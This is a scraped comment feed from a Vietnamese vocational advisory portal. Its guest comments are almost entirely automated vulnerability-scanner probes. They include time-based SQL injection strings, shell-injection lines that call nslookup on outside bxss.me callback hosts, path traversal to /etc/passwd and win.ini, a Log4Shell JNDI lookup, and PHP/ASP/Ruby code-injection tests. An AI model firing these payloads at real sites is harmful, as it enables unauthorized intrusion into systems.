  Khách 19-07-2024 10:51 CH
  1some_inexistent_file_with_long_name.jpg
  Khách 19-07-2024 10:51 CH
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 19-07-2024 10:51 CH
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 19-07-2024 10:51 CH
  ".gethostbyname(lc("hitsm"."awxhoejo07ea2.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(80).chr(99).chr(72)."
  Khách 19-07-2024 10:51 CH
  '.gethostbyname(lc('hithi'.'yjfurwtoa9d51.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(77).chr(100).chr(70).'
  Khách 19-07-2024 10:51 CH
  &n932418=v987631
  Khách 19-07-2024 10:51 CH
  ^(#$!@#$)(()))******
  Khách 19-07-2024 10:51 CH
  !(()&&!|*|*|
  Khách 19-07-2024 10:51 CH
  )
  Khách 19-07-2024 10:51 CH
  ${9999516+9999949}
  Khách 19-07-2024 10:51 CH
  ./
  Khách 19-07-2024 10:51 CH
  ../
  Khách 19-07-2024 10:51 CH
  ;(nslookup hitkjlsgoniqb0d559.bxss.me||perl -e "gethostbyname('hitkjlsgoniqb0d559.bxss.me')")|(nslookup hitkjlsgoniqb0d559.bxss.me||perl -e "gethostbyname('hitkjlsgoniqb0d559.bxss.me')")&(nslookup hitkjlsgoniqb0d559.bxss.me||perl -e "gethostbyname('hitkjlsgoniqb0d559.bxss.me')")
  Khách 19-07-2024 10:51 CH
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 19-07-2024 10:51 CH
  ../../../../../../../../../../../../../../etc/passwd
  Khách 19-07-2024 10:51 CH
  djhRnqfd
  Khách 19-07-2024 10:51 CH
  `(nslookup hitjrirqopceg0d24f.bxss.me||perl -e "gethostbyname('hitjrirqopceg0d24f.bxss.me')")`
  Khách 19-07-2024 10:51 CH
  |(nslookup hitmkjyialoaje95c0.bxss.me||perl -e "gethostbyname('hitmkjyialoaje95c0.bxss.me')")
  Khách 19-07-2024 10:51 CH
  &(nslookup hitopsakqgjska914a.bxss.me||perl -e "gethostbyname('hitopsakqgjska914a.bxss.me')")&'\"`0&(nslookup hitopsakqgjska914a.bxss.me||perl -e "gethostbyname('hitopsakqgjska914a.bxss.me')")&`'
  Khách 19-07-2024 10:51 CH
  $(nslookup hitakwcpajvkfe535d.bxss.me||perl -e "gethostbyname('hitakwcpajvkfe535d.bxss.me')")
  Khách 19-07-2024 10:51 CH
  (nslookup hitppgbmaiwxcac387.bxss.me||perl -e "gethostbyname('hitppgbmaiwxcac387.bxss.me')")
  Khách 19-07-2024 10:51 CH
  |echo gqkalj$()\ ktxkaz\nz^xyu||a #' |echo gqkalj$()\ ktxkaz\nz^xyu||a #|" |echo gqkalj$()\ ktxkaz\nz^xyu||a #
  Khách 19-07-2024 10:51 CH
  &echo yqnybu$()\ iahxqi\nz^xyu||a #' &echo yqnybu$()\ iahxqi\nz^xyu||a #|" &echo yqnybu$()\ iahxqi\nz^xyu||a #
  Khách 19-07-2024 10:51 CH
  echo peqxzh$()\ krutcw\nz^xyu||a #' &echo peqxzh$()\ krutcw\nz^xyu||a #|" &echo peqxzh$()\ krutcw\nz^xyu||a #
  Khách 19-07-2024 10:51 CH
  /../../../../../../../../../../windows/system32/BITSADMIN.exe
  Khách 19-07-2024 10:51 CH
  ${j${::-n}di:dns${::-:}//hitwazxroaxmyb2a48${::-.}bxss.me}
  Khách 19-07-2024 10:51 CH
  "+response.write(9267021*9709254)+"
  Khách 19-07-2024 10:51 CH
  '+response.write(9267021*9709254)+'
  Khách 19-07-2024 10:51 CH
  response.write(9267021*9709254)
  Khách 19-07-2024 07:52 CH
  @@dXEOk
  Khách 19-07-2024 07:52 CH
  1����%2527%2522
  Khách 19-07-2024 07:52 CH
  1'"
  Khách 19-07-2024 07:52 CH
  -1 OR 3+704-704-1=0+0+0+1
  Khách 19-07-2024 07:52 CH
  -1 OR 2+704-704-1=0+0+0+1
  Khách 19-07-2024 07:52 CH
  1*
  Khách 19-07-2024 07:52 CH
  1*
  Khách 19-07-2024 07:52 CH
  1*
  Khách 19-07-2024 07:52 CH
  1*
  Khách 19-07-2024 07:52 CH
  j7Dlt636
  Khách 19-07-2024 07:31 CH
  9226557
  Khách 19-07-2024 07:31 CH
  '"
  Khách 19-07-2024 07:31 CH
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 19-07-2024 07:31 CH
  /xfs.bxss.me
  Khách 19-07-2024 07:31 CH
  138/.
  Khách 19-07-2024 07:31 CH
  138
  Khách 19-07-2024 07:31 CH
  138
  Khách 19-07-2024 07:31 CH
  '.print(md5(31337)).'
  Khách 19-07-2024 07:31 CH
  ${@print(md5(31337))}\
  Khách 19-07-2024 07:31 CH
  ${@print(md5(31337))}
  Khách 19-07-2024 07:31 CH
  '+'A'.concat(70-3).concat(22*4).concat(114).concat(83).concat(122).concat(71)+(require'socket' Socket.gethostbyname('hithu'+'jljilzdn5c778.bxss.me.')[3].to_s)+'
  Khách 19-07-2024 07:31 CH
  "+"A".concat(70-3).concat(22*4).concat(116).concat(85).concat(117).concat(79)+(require"socket" Socket.gethostbyname("hitri"+"qaidmcdk1ffda.bxss.me.")[3].to_s)+"
  Khách 19-07-2024 07:31 CH
  ";print(md5(31337));$a="
  Khách 19-07-2024 07:31 CH
  ';print(md5(31337));$a='
  Khách 19-07-2024 07:31 CH
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 19-07-2024 07:31 CH
  bxss.me/t/xss.html?%00
  Khách 19-07-2024 07:31 CH
  HttP://bxss.me/t/xss.html?%00
  Khách 19-07-2024 07:30 CH
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 19-07-2024 07:30 CH
  ".gethostbyname(lc("hitue"."nksefmdyd5eb5.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(87).chr(103).chr(65)."
  Khách 19-07-2024 07:30 CH
  '.gethostbyname(lc('hitga'.'ffukufxsd75f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(87).chr(99).chr(79).'
  Khách 19-07-2024 07:30 CH
  ^(#$!@#$)(()))******
  Khách 19-07-2024 07:30 CH
  !(()&&!|*|*|
  Khách 19-07-2024 07:30 CH
  )
  Khách 19-07-2024 07:30 CH
  bxss.me
  Khách 19-07-2024 07:30 CH
  http://bxss.me/t/fit.txt?.jpg
  Khách 19-07-2024 07:30 CH
  Http://bxss.me/t/fit.txt
  Khách 19-07-2024 07:30 CH
  1some_inexistent_file_with_long_name.jpg
  Khách 19-07-2024 07:30 CH
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 19-07-2024 07:30 CH
  '"()
  Khách 19-07-2024 07:30 CH
  &n962726=v930596
  Khách 19-07-2024 07:30 CH
  ${10000129+9999317}
  Khách 19-07-2024 07:30 CH
  12345'"\'\");|]*{ <>�''💡
  Khách 19-07-2024 07:30 CH
  ./
  Khách 19-07-2024 07:30 CH
  ../
  Khách 19-07-2024 07:30 CH
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 19-07-2024 07:30 CH
  ../../../../../../../../../../../../../../etc/passwd
  Khách 19-07-2024 07:30 CH
  ;(nslookup hitkcckhitfuv1de8a.bxss.me||perl -e "gethostbyname('hitkcckhitfuv1de8a.bxss.me')")|(nslookup hitkcckhitfuv1de8a.bxss.me||perl -e "gethostbyname('hitkcckhitfuv1de8a.bxss.me')")&(nslookup hitkcckhitfuv1de8a.bxss.me||perl -e "gethostbyname('hitkcckhitfuv1de8a.bxss.me')")
  Khách 19-07-2024 07:30 CH
  `(nslookup hitrhxfsmibug0497d.bxss.me||perl -e "gethostbyname('hitrhxfsmibug0497d.bxss.me')")`
  Khách 19-07-2024 07:30 CH
  |(nslookup hitfikufwswac3330d.bxss.me||perl -e "gethostbyname('hitfikufwswac3330d.bxss.me')")
  Khách 19-07-2024 07:30 CH
  &(nslookup hitzwsvyjsojr9ed35.bxss.me||perl -e "gethostbyname('hitzwsvyjsojr9ed35.bxss.me')")&'\"`0&(nslookup hitzwsvyjsojr9ed35.bxss.me||perl -e "gethostbyname('hitzwsvyjsojr9ed35.bxss.me')")&`'
  Khách 19-07-2024 07:30 CH
  $(nslookup hitymobruevtj8f522.bxss.me||perl -e "gethostbyname('hitymobruevtj8f522.bxss.me')")
  Khách 19-07-2024 07:30 CH
  (nslookup hitfzjglaypdpb8883.bxss.me||perl -e "gethostbyname('hitfzjglaypdpb8883.bxss.me')")
  Khách 19-07-2024 07:30 CH
  |echo dlmohm$()\ llhwwp\nz^xyu||a #' |echo dlmohm$()\ llhwwp\nz^xyu||a #|" |echo dlmohm$()\ llhwwp\nz^xyu||a #
  Khách 19-07-2024 07:30 CH
  &echo xnymqq$()\ tcbamk\nz^xyu||a #' &echo xnymqq$()\ tcbamk\nz^xyu||a #|" &echo xnymqq$()\ tcbamk\nz^xyu||a #
  Khách 19-07-2024 07:30 CH
  echo fadtqf$()\ uffbqy\nz^xyu||a #' &echo fadtqf$()\ uffbqy\nz^xyu||a #|" &echo fadtqf$()\ uffbqy\nz^xyu||a #
  Khách 19-07-2024 07:30 CH
  V5F5KX8L
  Khách 19-07-2024 07:30 CH
  /../../../../../../../../../../windows/system32/BITSADMIN.exe
  Khách 19-07-2024 07:30 CH
  "+response.write(9966635*9090710)+"
  Khách 19-07-2024 07:30 CH
  '+response.write(9966635*9090710)+'
  Khách 19-07-2024 07:30 CH
  response.write(9966635*9090710)
  Khách 19-07-2024 07:30 CH
  ${j${::-n}di:dns${::-:}//hitfuoulgulsd4e599${::-.}bxss.me}
  Khách 17-05-2024 05:28 CH
  @@jd042
  Khách 17-05-2024 05:28 CH
  1����%2527%2522
  Khách 17-05-2024 05:28 CH
  1'"
  Khách 17-05-2024 05:28 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 17-05-2024 05:28 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 17-05-2024 05:28 CH
  YR5XQZiW')) OR 276=(SELECT 276 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  BLEiUxUG') OR 353=(SELECT 353 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  J34d22nT' OR 153=(SELECT 153 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  -1)) OR 90=(SELECT 90 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  -5) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  -5 OR 926=(SELECT 926 FROM PG_SLEEP(15))--
  Khách 17-05-2024 05:28 CH
  Qpxe2eim')); waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  EujDZkNj'); waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  omj3nC0u'; waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  1 waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  -1)); waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  -1); waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  -1; waitfor delay '0:0:15' --
  Khách 17-05-2024 05:28 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 17-05-2024 05:28 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 17-05-2024 05:28 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 17-05-2024 05:28 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 17-05-2024 05:28 CH
  -1 OR 3+91-91-1=0+0+0+1
  Khách 17-05-2024 05:28 CH
  -1 OR 2+91-91-1=0+0+0+1
  Khách 17-05-2024 05:28 CH
  1*
  Khách 17-05-2024 05:28 CH
  1*
  Khách 17-05-2024 05:28 CH
  1*
  Khách 17-05-2024 05:28 CH
  1*
  Khách 17-05-2024 05:28 CH
  SPYltoxo
  Khách 17-05-2024 04:58 CH
  @@sHNMi
  Khách 17-05-2024 04:58 CH
  1����%2527%2522
  Khách 17-05-2024 04:58 CH
  1'"
  Khách 17-05-2024 04:58 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 17-05-2024 04:58 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 17-05-2024 04:58 CH
  RaoobWzf')) OR 646=(SELECT 646 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  Dd8n8VAK') OR 173=(SELECT 173 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  pV8PW65i' OR 838=(SELECT 838 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  -1)) OR 663=(SELECT 663 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  -5) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  -5 OR 418=(SELECT 418 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:58 CH
  nyaVyFZC')); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:58 CH
  RNVCl8If'); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:58 CH
  5djlgvVu'; waitfor delay '0:0:15' --
  Khách 17-05-2024 04:58 CH
  1 waitfor delay '0:0:15' --
  Khách 17-05-2024 04:58 CH
  -1)); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:58 CH
  -1); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:57 CH
  -1; waitfor delay '0:0:15' --
  Khách 17-05-2024 04:57 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 17-05-2024 04:57 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 17-05-2024 04:57 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 17-05-2024 04:57 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 17-05-2024 04:57 CH
  -1 OR 3+567-567-1=0+0+0+1
  Khách 17-05-2024 04:57 CH
  -1 OR 2+567-567-1=0+0+0+1
  Khách 17-05-2024 04:57 CH
  1*
  Khách 17-05-2024 04:57 CH
  1*
  Khách 17-05-2024 04:57 CH
  1*
  Khách 17-05-2024 04:57 CH
  1*
  Khách 17-05-2024 04:57 CH
  rTtvARMD
  Khách 17-05-2024 04:32 CH
  @@2hwyL
  Khách 17-05-2024 04:32 CH
  1����%2527%2522
  Khách 17-05-2024 04:32 CH
  1'"
  Khách 17-05-2024 04:32 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 17-05-2024 04:32 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 17-05-2024 04:32 CH
  vZsHijfW')) OR 127=(SELECT 127 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  YQibjNuD') OR 635=(SELECT 635 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  YgGiww6m' OR 425=(SELECT 425 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  -1)) OR 205=(SELECT 205 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  -5) OR 410=(SELECT 410 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  -5 OR 416=(SELECT 416 FROM PG_SLEEP(15))--
  Khách 17-05-2024 04:32 CH
  QstVpqRf')); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  LLqfVMM3'); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  JkgvZzYF'; waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  1 waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  -1)); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  -1); waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  -1; waitfor delay '0:0:15' --
  Khách 17-05-2024 04:32 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 17-05-2024 04:32 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 17-05-2024 04:32 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 17-05-2024 04:32 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 17-05-2024 04:32 CH
  -1 OR 3+138-138-1=0+0+0+1
  Khách 17-05-2024 04:32 CH
  -1 OR 2+138-138-1=0+0+0+1
  Khách 17-05-2024 04:32 CH
  1*
  Khách 17-05-2024 04:32 CH
  1*
  Khách 17-05-2024 04:32 CH
  1*
  Khách 17-05-2024 04:32 CH
  1*
  Khách 17-05-2024 04:32 CH
  0MamhsrA

  Nội dung khác gần đây
  Tổng số bài viết: 53
  Cổng thông tin Hội đồng tư vấn nghề hỗ trợ trao đổi thông tin và điều phối hoạt động một cách hiệu quả của từng HĐTVN và giữa các HĐTVN. Cổng thông tin cho phép quản lý hoạt động, nhân rộng kết quả, trao đổi kinh nghiệm và bài học thành công, chia sẻ tài nguyên, tài liệu liên quan đến ngành nghề đào tạo và tư vấn, thảo luận các thách thức và giải pháp, công khai và truyền thông hoạt động của các HĐTVN, góp phần thúc đẩy mạnh mẽ hoạt động hợp tác nhà trường – doanh nghiệp, nâng cao chất lượng đào tạo.

  Thông tin liên hệ:
  • Email Cổng thông tin: iaboardsystem@gmail.com